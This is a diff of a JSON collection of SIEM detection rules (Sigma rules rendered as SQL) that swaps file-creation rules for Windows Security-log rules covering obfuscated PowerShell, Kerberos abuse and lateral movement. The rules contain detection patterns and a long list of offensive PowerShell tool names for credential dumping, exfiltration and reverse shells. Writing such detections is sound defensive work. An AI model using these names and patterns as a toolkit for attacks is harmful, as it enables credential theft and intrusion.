"Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Startup Folder File Write", - "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "status": "test", - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + ], + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + }, + { + "title": "ISO Image Mount", + "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "status": "experimental", + "description": "Detects the mount of ISO images on an endpoint", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + "Software installation ISO files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_startup_folder_file_write.yml" + "filename": "win_security_iso_mount.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.009" + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "description": "Detects service ticket requests using RC4 encryption type", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_susp_rc4_kerberos.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Initial installation of a domain controller" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "Denied Access To Remote Desktop", + "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "author": "Pushkarev Dmitry", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Valid user was not added to RDP group" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR 